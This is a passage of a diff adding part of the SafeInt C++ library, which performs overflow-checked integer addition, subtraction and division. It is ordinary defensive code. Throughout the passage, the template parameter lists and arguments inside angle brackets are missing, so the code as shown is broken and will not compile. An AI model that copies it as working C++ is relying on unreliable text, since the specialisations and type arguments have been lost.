(T)((__int64)t / (__int64)u); + } + else // Corner case + if (t == IntTraits::minInt && u == (unsigned __int64)IntTraits::minInt) + { + // Min int divided by it's own magnitude is -1 + result = -1; + } + else + { + result = 0; + } + } +}; + +template +class DivisionHelper +{ +public: + // T is any signed, U is unsigned and smaller than 32-bit + // In this case, standard operator casting is correct + static SafeIntError Divide(const T& t, const U& u, T& result) SAFEINT_NOTHROW + { + if (u == 0) + { + return SafeIntDivideByZero; + } + + if (t == 0) + { + result = 0; + return SafeIntNoError; + } + + result = (T)(t / u); + return SafeIntNoError; + } + + template + static void DivideThrow(const T& t, const U& u, T& result) SAFEINT_CPP_THROW + { + if (u == 0) + { + E::SafeIntOnDivZero(); + } + + if (t == 0) + { + result = 0; + return; + } + + result = (T)(t / u); + } +}; + +template +class DivisionHelper +{ +public: + static SafeIntError Divide(const T& t, const U& u, T& result) SAFEINT_NOTHROW + { + if (u == 0) + { + return SafeIntDivideByZero; + } + + if (t == 0) + { + result = 0; + return SafeIntNoError; + } + + // Must test for corner case + if (t == IntTraits::minInt && u == (U)-1) return SafeIntArithmeticOverflow; + + result = (T)(t / u); + return SafeIntNoError; + } + + template + static void DivideThrow(const T& t, const U& u, T& result) SAFEINT_CPP_THROW + { + if (u == 0) + { + E::SafeIntOnDivZero(); + } + + if (t == 0) + { + result = 0; + return; + } + + // Must test for corner case + if (t == IntTraits::minInt && u == (U)-1) E::SafeIntOnOverflow(); + + result = (T)(t / u); + } +}; + +enum AdditionState +{ + AdditionState_CastIntCheckMax, + AdditionState_CastUintCheckOverflow, + AdditionState_CastUintCheckOverflowMax, + AdditionState_CastUint64CheckOverflow, + AdditionState_CastUint64CheckOverflowMax, + AdditionState_CastIntCheckSafeIntMinMax, + AdditionState_CastInt64CheckSafeIntMinMax, + AdditionState_CastInt64CheckMax, + AdditionState_CastUint64CheckSafeIntMinMax, + AdditionState_CastUint64CheckSafeIntMinMax2, + AdditionState_CastInt64CheckOverflow, + AdditionState_CastInt64CheckOverflowSafeIntMinMax, + AdditionState_CastInt64CheckOverflowMax, + AdditionState_ManualCheckInt64Uint64, + AdditionState_ManualCheck, + AdditionState_Error +}; + +template +class AdditionMethod +{ +public: + enum + { + // unsigned-unsigned + method = + (IntRegion::IntZone_UintLT32_UintLT32 + ? AdditionState_CastIntCheckMax + : (IntRegion::IntZone_Uint32_UintLT64) + ? AdditionState_CastUintCheckOverflow + : (IntRegion::IntZone_UintLT32_Uint32) + ? AdditionState_CastUintCheckOverflowMax + : (IntRegion::IntZone_Uint64_Uint) + ? AdditionState_CastUint64CheckOverflow + : (IntRegion::IntZone_UintLT64_Uint64) + ? AdditionState_CastUint64CheckOverflowMax + : + // unsigned-signed + (IntRegion::IntZone_UintLT32_IntLT32) + ? AdditionState_CastIntCheckSafeIntMinMax + : (IntRegion::IntZone_Uint32_IntLT64 || + IntRegion::IntZone_UintLT32_Int32) + ? AdditionState_CastInt64CheckSafeIntMinMax + : (IntRegion::IntZone_Uint64_Int || + IntRegion::IntZone_Uint64_Int64) + ? AdditionState_CastUint64CheckSafeIntMinMax + : (IntRegion::IntZone_UintLT64_Int64) + ? AdditionState_CastUint64CheckSafeIntMinMax2 + : + // signed-signed + (IntRegion::IntZone_IntLT32_IntLT32) + ? AdditionState_CastIntCheckSafeIntMinMax + : (IntRegion::IntZone_Int32_IntLT64 || + IntRegion::IntZone_IntLT32_Int32) + ? AdditionState_CastInt64CheckSafeIntMinMax + : (IntRegion::IntZone_Int64_Int || + IntRegion::IntZone_Int64_Int64) + ? AdditionState_CastInt64CheckOverflow + : (IntRegion::IntZone_IntLT64_Int64) + ? AdditionState_CastInt64CheckOverflowSafeIntMinMax + : + // signed-unsigned + (IntRegion:: + IntZone_IntLT32_UintLT32) + ? AdditionState_CastIntCheckMax + : (IntRegion:: + IntZone_Int32_UintLT32 || + IntRegion:: + IntZone_IntLT64_Uint32) + ? AdditionState_CastInt64CheckMax + : (IntRegion:: + IntZone_Int64_UintLT64) + ? AdditionState_CastInt64CheckOverflowMax + : (IntRegion:: + IntZone_Int64_Uint64) + ? AdditionState_ManualCheckInt64Uint64 + : (IntRegion< + T, + U>:: + IntZone_Int_Uint64) + ? AdditionState_ManualCheck + : AdditionState_Error) + }; +}; + +template +class AdditionHelper; + +template +class AdditionHelper +{ +public: + static bool Addition(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // 16-bit or less unsigned addition + __int32 tmp = lhs + rhs; + + if (tmp <= (__int32)IntTraits::maxInt) + { + result = (T)tmp; + return true; + } + + return false; + } + + template + static void AdditionThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // 16-bit or less unsigned addition + __int32 tmp = lhs + rhs; + + if (tmp <= (__int32)IntTraits::maxInt) + { + result = (T)tmp; + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class AdditionHelper +{ +public: + static bool Addition(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // 32-bit or less - both are unsigned + unsigned __int32 tmp = (unsigned __int32)lhs + (unsigned __int32)rhs; + + // we added didn't get smaller + if (tmp >= lhs) + { + result = (T)tmp; + return true; + } + return false; + } + + template + static void AdditionThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // 32-bit or less - both are unsigned + unsigned __int32 tmp = (unsigned __int32)lhs + (unsigned __int32)rhs; + + // we added didn't get smaller + if (tmp >= lhs) + { + result = (T)tmp; + return; + } + E::SafeIntOnOverflow(); + } +}; + +template +class AdditionHelper +{ +public: + static bool Addition(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // 32-bit or less - both are unsigned + unsigned __int32 tmp = (unsigned __int32)lhs + (unsigned __int32)rhs; + + // We added and it didn't get smaller or exceed maxInt + if (tmp >= lhs && tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return true; + } + return false; + } + + template + static void AdditionThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // 32-bit or less - both are unsigned + unsigned __int32 tmp = (unsigned __int32)lhs + (unsigned __int32)rhs; + + // We added and it didn't get smaller or exceed maxInt + if (tmp >= lhs && tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return; + } + E::SafeIntOnOverflow(); + } +}; + +template +class AdditionHelper +{ +public: + static bool Addition(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // lhs unsigned __int64, rhs unsigned + unsigned __int64 tmp = (unsigned __int64)lhs + (unsigned __int64)rhs; + + // We added and it didn't get smaller + if (tmp >= lhs) + { + result = (T)tmp; + return true; + } + + return false; + } + + template + static void AdditionThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // lhs unsigned __int64, rhs unsigned + unsigned __int64 tmp = (unsigned __int64)lhs + (unsigned __int64)rhs; + + // We added and it didn't get smaller + if (tmp >= lhs) + { + result = (T)tmp; + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class AdditionHelper +{ +public: + static bool Addition(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // lhs unsigned __int64, rhs unsigned + unsigned __int64 tmp = (unsigned __int64)lhs + (unsigned __int64)rhs; + + // We added and it didn't get smaller + if (tmp >= lhs && tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return true; + } + + return false; + } + + template + static void AdditionThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // lhs unsigned __int64, rhs unsigned + unsigned __int64 tmp = (unsigned __int64)lhs + (unsigned __int64)rhs; + + // We added and it didn't get smaller + if (tmp >= lhs && tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class AdditionHelper +{ +public: + static bool Addition(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // 16-bit or less - one or both are signed + __int32 tmp = lhs + rhs; + + if (tmp <= (__int32)IntTraits::maxInt && tmp >= (__int32)IntTraits::minInt) + { + result = (T)tmp; + return true; + } + + return false; + } + + template + static void AdditionThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // 16-bit or less - one or both are signed + __int32 tmp = lhs + rhs; + + if (tmp <= (__int32)IntTraits::maxInt && tmp >= (__int32)IntTraits::minInt) + { + result = (T)tmp; + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class AdditionHelper +{ +public: + static bool Addition(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // 32-bit or less - one or both are signed + __int64 tmp = (__int64)lhs + (__int64)rhs; + + if (tmp <= (__int64)IntTraits::maxInt && tmp >= (__int64)IntTraits::minInt) + { + result = (T)tmp; + return true; + } + + return false; + } + + template + static void AdditionThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // 32-bit or less - one or both are signed + __int64 tmp = (__int64)lhs + (__int64)rhs; + + if (tmp <= (__int64)IntTraits::maxInt && tmp >= (__int64)IntTraits::minInt) + { + result = (T)tmp; + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class AdditionHelper +{ +public: + static bool Addition(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // 32-bit or less - lhs signed, rhs unsigned + __int64 tmp = (__int64)lhs + (__int64)rhs; + + if (tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return true; + } + + return false; + } + + template + static void AdditionThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // 32-bit or less - lhs signed, rhs unsigned + __int64 tmp = (__int64)lhs + (__int64)rhs; + + if (tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class AdditionHelper +{ +public: + static bool Addition(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // lhs is unsigned __int64, rhs signed + unsigned __int64 tmp; + + if (rhs < 0) + { + // So we're effectively subtracting + tmp = AbsValueHelper::method>::Abs(rhs); + + if (tmp <= lhs) + { + result = lhs - tmp; + return true; + } + } + else + { + // now we know that rhs can be safely cast into an unsigned __int64 + tmp = (unsigned __int64)lhs + (unsigned __int64)rhs; + + // We added and it did not become smaller + if (tmp >= lhs) + { + result = (T)tmp; + return true; + } + } + + return false; + } + + template + static void AdditionThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // lhs is unsigned __int64, rhs signed + unsigned __int64 tmp; + + if (rhs < 0) + { + // So we're effectively subtracting + tmp = AbsValueHelper::method>::Abs(rhs); + + if (tmp <= lhs) + { + result = lhs - tmp; + return; + } + } + else + { + // now we know that rhs can be safely cast into an unsigned __int64 + tmp = (unsigned __int64)lhs + (unsigned __int64)rhs; + + // We added and it did not become smaller + if (tmp >= lhs) + { + result = (T)tmp; + return; + } + } + + E::SafeIntOnOverflow(); + } +}; + +template +class AdditionHelper +{ +public: + static bool Addition(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // lhs is unsigned and < 64-bit, rhs signed __int64 + if (rhs < 0) + { + if (lhs >= ~(unsigned __int64)(rhs) + 1) // negation is safe, since rhs is 64-bit + { + result = (T)(lhs + rhs); + return true; + } + } + else + { + // now we know that rhs can be safely cast into an unsigned __int64 + unsigned __int64 tmp = (unsigned __int64)lhs + (unsigned __int64)rhs; + + // special case - rhs cannot be larger than 0x7fffffffffffffff, lhs cannot be larger than 0xffffffff + // it is not possible for the operation above to overflow, so just check max + if (tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return true; + } + } + return false; + } + + template + static void AdditionThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // lhs is unsigned and < 64-bit, rhs signed __int64 + if (rhs < 0) + { + if (lhs >= ~(unsigned __int64)(rhs) + 1) // negation is safe, since rhs is 64-bit + { + result = (T)(lhs + rhs); + return; + } + } + else + { + // now we know that rhs can be safely cast into an unsigned __int64 + unsigned __int64 tmp = (unsigned __int64)lhs + (unsigned __int64)rhs; + + // special case - rhs cannot be larger than 0x7fffffffffffffff, lhs cannot be larger than 0xffffffff + // it is not possible for the operation above to overflow, so just check max + if (tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return; + } + } + E::SafeIntOnOverflow(); + } +}; + +template +class AdditionHelper +{ +public: + static bool Addition(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // lhs is signed __int64, rhs signed + __int64 tmp = (__int64)((unsigned __int64)lhs + (unsigned __int64)rhs); + + if (lhs >= 0) + { + // mixed sign cannot overflow + if (rhs >= 0 && tmp < lhs) return false; + } + else + { + // lhs negative + if (rhs < 0 && tmp > lhs) return false; + } + + result = (T)tmp; + return true; + } + + template + static void AdditionThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // lhs is signed __int64, rhs signed + __int64 tmp = (__int64)((unsigned __int64)lhs + (unsigned __int64)rhs); + + if (lhs >= 0) + { + // mixed sign cannot overflow + if (rhs >= 0 && tmp < lhs) E::SafeIntOnOverflow(); + } + else + { + // lhs negative + if (rhs < 0 && tmp > lhs) E::SafeIntOnOverflow(); + } + + result = (T)tmp; + } +}; + +template +class AdditionHelper +{ +public: + static bool Addition(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // rhs is signed __int64, lhs signed + __int64 tmp; + + if (AdditionHelper<__int64, __int64, AdditionState_CastInt64CheckOverflow>::Addition( + (__int64)lhs, (__int64)rhs, tmp) && + tmp <= IntTraits::maxInt && tmp >= IntTraits::minInt) + { + result = (T)tmp; + return true; + } + + return false; + } + + template + static void AdditionThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // rhs is signed __int64, lhs signed + __int64 tmp; + + AdditionHelper<__int64, __int64, AdditionState_CastInt64CheckOverflow>::AdditionThrow( + (__int64)lhs, (__int64)rhs, tmp); + + if (tmp <= IntTraits::maxInt && tmp >= IntTraits::minInt) + { + result = (T)tmp; + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class AdditionHelper +{ +public: + static bool Addition(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // lhs is signed __int64, rhs unsigned < 64-bit + unsigned __int64 tmp = (unsigned __int64)lhs + (unsigned __int64)rhs; + + if ((__int64)tmp >= lhs) + { + result = (T)(__int64)tmp; + return true; + } + + return false; + } + + template + static void AdditionThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // lhs is signed __int64, rhs unsigned < 64-bit + // Some compilers get optimization-happy, let's thwart them + + unsigned __int64 tmp = (unsigned __int64)lhs + (unsigned __int64)rhs; + + if ((__int64)tmp >= lhs) + { + result = (T)(__int64)tmp; + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class AdditionHelper +{ +public: + static bool Addition(const __int64& lhs, const unsigned __int64& rhs, __int64& result) SAFEINT_NOTHROW + { + C_ASSERT(IntTraits::isInt64 && IntTraits::isUint64); + // rhs is unsigned __int64, lhs __int64 + // cast everything to unsigned, perform addition, then + // cast back for check - this is done to stop optimizers from removing the code + unsigned __int64 tmp = (unsigned __int64)lhs + rhs; + + if ((__int64)tmp >= lhs) + { + result = (__int64)tmp; + return true; + } + + return false; + } + + template + static void AdditionThrow(const __int64& lhs, const unsigned __int64& rhs, T& result) SAFEINT_CPP_THROW + { + C_ASSERT(IntTraits::isInt64 && IntTraits::isUint64); + // rhs is unsigned __int64, lhs __int64 + unsigned __int64 tmp = (unsigned __int64)lhs + rhs; + + if ((__int64)tmp >= lhs) + { + result = (__int64)tmp; + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class AdditionHelper +{ +public: + static bool Addition(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // rhs is unsigned __int64, lhs signed, 32-bit or less + if ((unsigned __int32)(rhs >> 32) == 0) + { + // Now it just happens to work out that the standard behavior does what we want + // Adding explicit casts to show exactly what's happening here + // Note - this is tweaked to keep optimizers from tossing out the code. + unsigned __int32 tmp = (unsigned __int32)rhs + (unsigned __int32)lhs; + + if ((__int32)tmp >= lhs && + SafeCastHelper::method>::Cast((__int32)tmp, result)) + return true; + } + + return false; + } + + template + static void AdditionThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // rhs is unsigned __int64, lhs signed, 32-bit or less + + if ((unsigned __int32)(rhs >> 32) == 0) + { + // Now it just happens to work out that the standard behavior does what we want + // Adding explicit casts to show exactly what's happening here + unsigned __int32 tmp = (unsigned __int32)rhs + (unsigned __int32)lhs; + + if ((__int32)tmp >= lhs) + { + SafeCastHelper::method>::template CastThrow((__int32)tmp, + result); + return; + } + } + E::SafeIntOnOverflow(); + } +}; + +enum SubtractionState +{ + SubtractionState_BothUnsigned, + SubtractionState_CastIntCheckSafeIntMinMax, + SubtractionState_CastIntCheckMin, + SubtractionState_CastInt64CheckSafeIntMinMax, + SubtractionState_CastInt64CheckMin, + SubtractionState_Uint64Int, + SubtractionState_UintInt64, + SubtractionState_Int64Int, + SubtractionState_IntInt64, + SubtractionState_Int64Uint, + SubtractionState_IntUint64, + SubtractionState_Int64Uint64, + // states for SubtractionMethod2 + SubtractionState_BothUnsigned2, + SubtractionState_CastIntCheckSafeIntMinMax2, + SubtractionState_CastInt64CheckSafeIntMinMax2, + SubtractionState_Uint64Int2, + SubtractionState_UintInt642, + SubtractionState_Int64Int2, + SubtractionState_IntInt642, + SubtractionState_Int64Uint2, + SubtractionState_IntUint642, + SubtractionState_Int64Uint642, + SubtractionState_Error +}; + +template +class SubtractionMethod +{ +public: + enum + { + // unsigned-unsigned + method = + ((IntRegion::IntZone_UintLT32_UintLT32 || (IntRegion::IntZone_Uint32_UintLT64) || + (IntRegion::IntZone_UintLT32_Uint32) || (IntRegion::IntZone_Uint64_Uint) || + (IntRegion::IntZone_UintLT64_Uint64)) + ? SubtractionState_BothUnsigned + : + // unsigned-signed + (IntRegion::IntZone_UintLT32_IntLT32) + ? SubtractionState_CastIntCheckSafeIntMinMax + : (IntRegion::IntZone_Uint32_IntLT64 || IntRegion::IntZone_UintLT32_Int32) + ? SubtractionState_CastInt64CheckSafeIntMinMax + : (IntRegion::IntZone_Uint64_Int || IntRegion::IntZone_Uint64_Int64) + ? SubtractionState_Uint64Int + : (IntRegion::IntZone_UintLT64_Int64) ? SubtractionState_UintInt64 : + // signed-signed + (IntRegion::IntZone_IntLT32_IntLT32) + ? SubtractionState_CastIntCheckSafeIntMinMax + : (IntRegion::IntZone_Int32_IntLT64 || + IntRegion::IntZone_IntLT32_Int32) + ? SubtractionState_CastInt64CheckSafeIntMinMax + : (IntRegion::IntZone_Int64_Int || + IntRegion::IntZone_Int64_Int64) + ? SubtractionState_Int64Int + : (IntRegion::IntZone_IntLT64_Int64) + ? SubtractionState_IntInt64 + : + // signed-unsigned + (IntRegion::IntZone_IntLT32_UintLT32) + ? SubtractionState_CastIntCheckMin + : (IntRegion::IntZone_Int32_UintLT32 || + IntRegion::IntZone_IntLT64_Uint32) + ? SubtractionState_CastInt64CheckMin + : (IntRegion::IntZone_Int64_UintLT64) + ? SubtractionState_Int64Uint + : (IntRegion::IntZone_Int_Uint64) + ? SubtractionState_IntUint64 + : (IntRegion:: + IntZone_Int64_Uint64) + ? SubtractionState_Int64Uint64 + : SubtractionState_Error) + }; +}; + +// this is for the case of U - SafeInt< T, E > +template +class SubtractionMethod2 +{ +public: + enum + { + // unsigned-unsigned + method = + ((IntRegion::IntZone_UintLT32_UintLT32 || (IntRegion::IntZone_Uint32_UintLT64) || + (IntRegion::IntZone_UintLT32_Uint32) || (IntRegion::IntZone_Uint64_Uint) || + (IntRegion::IntZone_UintLT64_Uint64)) + ? SubtractionState_BothUnsigned2 + : + // unsigned-signed + (IntRegion::IntZone_UintLT32_IntLT32) + ? SubtractionState_CastIntCheckSafeIntMinMax2 + : (IntRegion::IntZone_Uint32_IntLT64 || IntRegion::IntZone_UintLT32_Int32) + ? SubtractionState_CastInt64CheckSafeIntMinMax2 + : (IntRegion::IntZone_Uint64_Int || IntRegion::IntZone_Uint64_Int64) + ? SubtractionState_Uint64Int2 + : (IntRegion::IntZone_UintLT64_Int64) ? SubtractionState_UintInt642 : + // signed-signed + (IntRegion::IntZone_IntLT32_IntLT32) + ? SubtractionState_CastIntCheckSafeIntMinMax2 + : (IntRegion::IntZone_Int32_IntLT64 || + IntRegion::IntZone_IntLT32_Int32) + ? SubtractionState_CastInt64CheckSafeIntMinMax2 + : (IntRegion::IntZone_Int64_Int || + IntRegion::IntZone_Int64_Int64) + ? SubtractionState_Int64Int2 + : (IntRegion::IntZone_IntLT64_Int64) + ? SubtractionState_IntInt642 + : + // signed-unsigned + (IntRegion::IntZone_IntLT32_UintLT32) + ? SubtractionState_CastIntCheckSafeIntMinMax2 + : (IntRegion::IntZone_Int32_UintLT32 || + IntRegion::IntZone_IntLT64_Uint32) + ? SubtractionState_CastInt64CheckSafeIntMinMax2 + : (IntRegion::IntZone_Int64_UintLT64) + ? SubtractionState_Int64Uint2 + : (IntRegion::IntZone_Int_Uint64) + ? SubtractionState_IntUint642 + : (IntRegion:: + IntZone_Int64_Uint64) + ? SubtractionState_Int64Uint642 + : SubtractionState_Error) + }; +}; + +template +class SubtractionHelper; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // both are unsigned - easy case + if (rhs <= lhs) + { + result = (T)(lhs - rhs); + return true; + } + + return false; + } + + template + static void SubtractThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // both are unsigned - easy case + if (rhs <= lhs) + { + result = (T)(lhs - rhs); + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const T& lhs, const U& rhs, U& result) SAFEINT_NOTHROW + { + // both are unsigned - easy case + // Except we do have to check for overflow - lhs could be larger than result can hold + if (rhs <= lhs) + { + T tmp = (T)(lhs - rhs); + return SafeCastHelper::method>::Cast(tmp, result); + } + + return false; + } + + template + static void SubtractThrow(const T& lhs, const U& rhs, U& result) SAFEINT_CPP_THROW + { + // both are unsigned - easy case + if (rhs <= lhs) + { + T tmp = (T)(lhs - rhs); + SafeCastHelper::method>::template CastThrow(tmp, result); + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // both values are 16-bit or less + // rhs is signed, so could end up increasing or decreasing + __int32 tmp = lhs - rhs; + + if (SafeCastHelper::method>::Cast(tmp, result)) + { + result = (T)tmp; + return true; + } + + return false; + } + + template + static void SubtractThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // both values are 16-bit or less + // rhs is signed, so could end up increasing or decreasing + __int32 tmp = lhs - rhs; + + SafeCastHelper::method>::template CastThrow(tmp, result); + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const U& lhs, const T& rhs, T& result) SAFEINT_NOTHROW + { + // both values are 16-bit or less + // rhs is signed, so could end up increasing or decreasing + __int32 tmp = lhs - rhs; + + return SafeCastHelper::method>::Cast(tmp, result); + } + + template + static void SubtractThrow(const U& lhs, const T& rhs, T& result) SAFEINT_CPP_THROW + { + // both values are 16-bit or less + // rhs is signed, so could end up increasing or decreasing + __int32 tmp = lhs - rhs; + + SafeCastHelper::method>::template CastThrow(tmp, result); + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // both values are 16-bit or less + // rhs is unsigned - check only minimum + __int32 tmp = lhs - rhs; + + if (tmp >= (__int32)IntTraits::minInt) + { + result = (T)tmp; + return true; + } + + return false; + } + + template + static void SubtractThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // both values are 16-bit or less + // rhs is unsigned - check only minimum + __int32 tmp = lhs - rhs; + + if (tmp >= (__int32)IntTraits::minInt) + { + result = (T)tmp; + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // both values are 32-bit or less + // rhs is signed, so could end up increasing or decreasing + __int64 tmp = (__int64)lhs - (__int64)rhs; + + return SafeCastHelper::method>::Cast(tmp, result); + } + + template + static void SubtractThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // both values are 32-bit or less + // rhs is signed, so could end up increasing or decreasing + __int64 tmp = (__int64)lhs - (__int64)rhs; + + SafeCastHelper::method>::template CastThrow(tmp, result); + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const U& lhs, const T& rhs, T& result) SAFEINT_NOTHROW + { + // both values are 32-bit or less + // rhs is signed, so could end up increasing or decreasing + __int64 tmp = (__int64)lhs - (__int64)rhs; + + return SafeCastHelper::method>::Cast(tmp, result); + } + + template + static void SubtractThrow(const U& lhs, const T& rhs, T& result) SAFEINT_CPP_THROW + { + // both values are 32-bit or less + // rhs is signed, so could end up increasing or decreasing + __int64 tmp = (__int64)lhs - (__int64)rhs; + + SafeCastHelper::method>::template CastThrow(tmp, result); + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // both values are 32-bit or less + // rhs is unsigned - check only minimum + __int64 tmp = (__int64)lhs - (__int64)rhs; + + if (tmp >= (__int64)IntTraits::minInt) + { + result = (T)tmp; + return true; + } + + return false; + } + + template + static void SubtractThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // both values are 32-bit or less + // rhs is unsigned - check only minimum + __int64 tmp = (__int64)lhs - (__int64)rhs; + + if (tmp >= (__int64)IntTraits::minInt) + { + result = (T)tmp; + return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // lhs is an unsigned __int64, rhs signed + // must first see if rhs is positive or negative + if (rhs >= 0) + { + if ((unsigned __int64)rhs <= lhs) + { + result = (T)(lhs - (unsigned __int64)rhs); + return true; + } + } + else + { + T tmp = lhs; + // we're now effectively adding + result = lhs + AbsValueHelper::method>::Abs(rhs); + + if (result >= tmp) return true; + } + + return false; + } + + template + static void SubtractThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // lhs is an unsigned __int64, rhs signed + // must first see if rhs is positive or negative + if (rhs >= 0) + { + if ((unsigned __int64)rhs <= lhs) + { + result = (T)(lhs - (unsigned __int64)rhs); + return; + } + } + else + { + T tmp = lhs; + // we're now effectively adding + result = lhs + AbsValueHelper::method>::Abs(rhs); + + if (result >= tmp) return; + } + + E::SafeIntOnOverflow(); + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const U& lhs, const T& rhs, T& result) SAFEINT_NOTHROW + { + // U is unsigned __int64, T is signed + if (rhs < 0) + { + // treat this as addition + unsigned __int64 tmp; + + tmp = lhs + (unsigned __int64)AbsValueHelper::method>::Abs(rhs); + + // must check for addition overflow and max + if (tmp >= lhs && tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return true; + } + } + else if ((unsigned __int64)rhs > lhs) // now both are positive, so comparison always works + { + // result is negative + // implies that lhs must fit into T, and result cannot overflow + // Also allows us to drop to 32-bit math, which is faster on a 32-bit system + result = (T)lhs - (T)rhs; + return true; + } + else + { + // result is positive + unsigned __int64 tmp = (unsigned __int64)lhs - (unsigned __int64)rhs; + + if (tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return true; + } + } + + return false; + } + + template + static void SubtractThrow(const U& lhs, const T& rhs, T& result) SAFEINT_CPP_THROW + { + // U is unsigned __int64, T is signed + if (rhs < 0) + { + // treat this as addition + unsigned __int64 tmp; + + tmp = lhs + (unsigned __int64)AbsValueHelper::method>::Abs(rhs); + + // must check for addition overflow and max + if (tmp >= lhs && tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return; + } + } + else if ((unsigned __int64)rhs > lhs) // now both are positive, so comparison always works + { + // result is negative + // implies that lhs must fit into T, and result cannot overflow + // Also allows us to drop to 32-bit math, which is faster on a 32-bit system + result = (T)lhs - (T)rhs; + return; + } + else + { + // result is positive + unsigned __int64 tmp = (unsigned __int64)lhs - (unsigned __int64)rhs; + + if (tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return; + } + } + + E::SafeIntOnOverflow(); + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const T& lhs, const U& rhs, T& result) SAFEINT_NOTHROW + { + // lhs is an unsigned int32 or smaller, rhs signed __int64 + // must first see if rhs is positive or negative + if (rhs >= 0) + { + if ((unsigned __int64)rhs <= lhs) + { + result = (T)(lhs - (T)rhs); + return true; + } + } + else + { + // we're now effectively adding + // since lhs is 32-bit, and rhs cannot exceed 2^63 + // this addition cannot overflow + unsigned __int64 tmp = lhs + ~(unsigned __int64)(rhs) + 1; // negation safe + + // but we could exceed MaxInt + if (tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return true; + } + } + + return false; + } + + template + static void SubtractThrow(const T& lhs, const U& rhs, T& result) SAFEINT_CPP_THROW + { + // lhs is an unsigned int32 or smaller, rhs signed __int64 + // must first see if rhs is positive or negative + if (rhs >= 0) + { + if ((unsigned __int64)rhs <= lhs) + { + result = (T)(lhs - (T)rhs); + return; + } + } + else + { + // we're now effectively adding + // since lhs is 32-bit, and rhs cannot exceed 2^63 + // this addition cannot overflow + unsigned __int64 tmp = lhs + ~(unsigned __int64)(rhs) + 1; // negation safe + + // but we could exceed MaxInt + if (tmp <= IntTraits::maxInt) + { + result = (T)tmp; + return; + } + } + + E::SafeIntOnOverflow(); + } +}; + +template +class SubtractionHelper +{ +public: + static bool Subtract(const U& lhs, const T& rhs, T& result) SAFEINT_NOTHROW + { + // U unsigned 32-bit or 